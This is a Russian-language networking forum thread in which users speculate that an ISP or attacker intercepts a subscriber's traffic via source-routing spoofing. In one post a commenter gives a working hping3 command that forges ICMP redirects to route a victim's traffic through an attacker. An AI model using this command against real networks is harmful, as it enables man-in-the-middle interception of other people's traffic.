The OpenNET Project / Index page

[ новости /+++ | форум | теги | ]



Вариант для распечатки  
Пред. тема | След. тема 
Форум Маршрутизаторы CISCO и др. оборудование. (Разное)
Режим отображения отдельной подветви беседы [ Отслеживать ]

Оглавление

при попытке загрузить объем >100Gb теряется доступ в интернет, Васечкин (?), 21-Сен-18, (0) [смотреть все]

Сообщения [Сортировка по времени | RSS]


5. "при попытке загрузить объем >100Gb теряется доступ в интернет"  +/
Сообщение от Аноним (5), 22-Сен-18, 21:41 

> Какая-то словесная каша. Непонятно что вкладывается в слова: "неадекваты", "кульхацкеры",
> "сетевеки провайдера". Это одни и те-же лица?

Андрей, а что такое "сетевеки"? Это как глаза со шторками, только для сети?

>Если разные,

Что надо принять чтобы сотрудник провайдера стал кульхацкером?

>то как
> между вами и оператором могжет быть кто-то еще?

знание сотрудником провайдера термина source routing намекает, что врезаться в кабель абонента в данном сегменте не нужно - трафик и так пойдёт через кульхацкера потому что оборудование провайдера, очевидно, не поддерживает изоляцию абонентов любым из доступных способов. похоже сурсроутингом делают митм, дампят весь трафик и в какой-то момент дамп файл переполняется - во всяком случае в старых редакциях сорм это так происходило.

> На linksys ошибки на сетевом интерфейсе регистрируются?
> Если качать большой объем, но ограничить скорость или больщой объем маленьких файлов,
> канал падает?

Ответить | Правка | Наверх | Cообщить модератору

6. "при попытке загрузить объем >100Gb теряется доступ в интернет"  +/
Сообщение от ыы (?), 23-Сен-18, 08:03 
> знание сотрудником провайдера термина source routing намекает,

Вы не внимательно читаете. Расскажите  пожалуйста что за тип атаки такой "fake source routing" ?
Гугл о таком не знает... На Вас вся надежда.. или на топикстартера...

Ответить | Правка | Наверх | Cообщить модератору

7. "при попытке загрузить объем >100Gb теряется доступ в интернет"  +/
Сообщение от ыы (?), 23-Сен-18, 08:13 
>> знание сотрудником провайдера термина source routing намекает,
> Вы не внимательно читаете. Расскажите  пожалуйста что за тип атаки такой
> "fake source routing" ?
> Гугл о таком не знает... На Вас вся надежда.. или на топикстартера...

Правды ради, гугл о чем-то таком слышал аж 7  (СЕМЬ !!!) результатов в ответе на запрос
https://www.google.ru/search?ie=UTF-8&hl=ru&q="fake...

Ответить | Правка | Наверх | Cообщить модератору

8. "при попытке загрузить объем >100Gb теряется доступ в интернет"  +/
Сообщение от Аноним (5), 23-Сен-18, 11:38 
>>> знание сотрудником провайдера термина source routing намекает,
>> Вы не внимательно читаете. Расскажите  пожалуйста что за тип атаки такой
>> "fake source routing" ?
>> Гугл о таком не знает... На Вас вся надежда.. или на топикстартера...
> Правды ради, гугл о чем-то таком слышал аж 7  (СЕМЬ !!!)
> результатов в ответе на запрос
> https://www.google.ru/search?ie=UTF-8&hl=ru&q="fake...

потому как атака очень старая и маргинальная зовется spoofing via source routing
https://laurasecurity.wordpress.com/2008/08/04/remote-ip-spo.../

суть: атакующий отправляет пакет компьютеру или роутеру жертвы с указанием использовать предпочитаемый путь где указывает себя в качестве гетвея при этом даже если жертва сделает traceroute она не увидит фактических изменений маршрутов, а трафик польется через атакующего. вобщем классический mitm на спуфинге. не лечится. ну то есть можно запретить source routing, но только в новых редакциях да и то не во всех ОС оно выключено по умолчанию.  


Ответить | Правка | Наверх | Cообщить модератору

9. "при попытке загрузить объем >100Gb теряется доступ в интернет"  +/
Сообщение от ыы (?), 23-Сен-18, 16:59 
>>>> знание сотрудником провайдера термина source routing намекает,
>>> Вы не внимательно читаете. Расскажите  пожалуйста что за тип атаки такой
>>> "fake source routing" ?
>>> Гугл о таком не знает... На Вас вся надежда.. или на топикстартера...
>> Правды ради, гугл о чем-то таком слышал аж 7  (СЕМЬ !!!)
>> результатов в ответе на запрос
>> https://www.google.ru/search?ie=UTF-8&hl=ru&q="fake...
> потому как атака очень старая и маргинальная зовется spoofing via source routing

https://www.google.ru/search?ie=UTF-8&hl=ru&q="spoofing...

20 результатов в гугле.

> https://laurasecurity.wordpress.com/2008/08/04/remote-ip-spo.../
> суть: атакующий отправляет пакет компьютеру или роутеру жертвы с указанием использовать
> предпочитаемый путь где указывает себя в качестве гетвея при этом даже
> если жертва сделает traceroute она не увидит фактических изменений маршрутов, а
> трафик польется через атакующего. вобщем классический mitm на спуфинге. не лечится.
> ну то есть можно запретить source routing, но только в новых
> редакциях да и то не во всех ОС оно выключено по
> умолчанию.

а вы в курсе о каком пакете идет речь? в рамках какого протокола? и что надо совершить и какие ляпы надо сделать чтобы это хотя-бы теоретически сработало?

Ответить | Правка | Наверх | Cообщить модератору

10. "при попытке загрузить объем >100Gb теряется доступ в интернет"  +/
Сообщение от Аноним (5), 23-Сен-18, 20:50 

> 20 результатов в гугле.

папу попросите отключить "родительский контроль"

> а вы в курсе о каком пакете идет речь? в рамках какого
> протокола?

читайте про icmp type 5 redirect, hping3, wireshark

>и что надо совершить и какие ляпы надо сделать

сетевику быть идиотом или не иметь управляемого оборудования

> чтобы это хотя-бы теоретически сработало?

ну вот сейчас проверил - работает:
hping3 <жертва> -C 5 -K 1 --icmp-gw <атакующий> -a <шлюз жертвы> --icmp-ipsrc <жертва> --icmp-ipdest <vk.xxx>

Ответить | Правка | Наверх | Cообщить модератору

11. "при попытке загрузить объем >100Gb теряется доступ в интернет"  +/
Сообщение от Полимер Пластикович (?), 25-Сен-18, 11:51 

> ну вот сейчас проверил - работает:
> hping3 <жертва> -C 5 -K 1 --icmp-gw <атакующий> -a <шлюз жертвы> --icmp-ipsrc
> <жертва> --icmp-ipdest <vk.xxx>

Кому ты отвечаешь? Скрипткидди же. Теперь пойдёт соседей по подсети мучать. :)
Нет бы сразу вот так http://www.enclaveforensics.com/resources/Source_Routing.pdf
Благо, ограничение в 9 хопов.

Ответить | Правка | Наверх | Cообщить модератору

Архив | Удалить

Рекомендовать для помещения в FAQ | Индекс форумов | Темы | Пред. тема | След. тема




Партнёры:
PostgresPro
Inferno Solutions
Hosting by Hoster.ru
Хостинг:

Закладки на сайте
Проследить за страницей
Created 1996-2024 by Maxim Chirkov
Добавить, Поддержать, Вебмастеру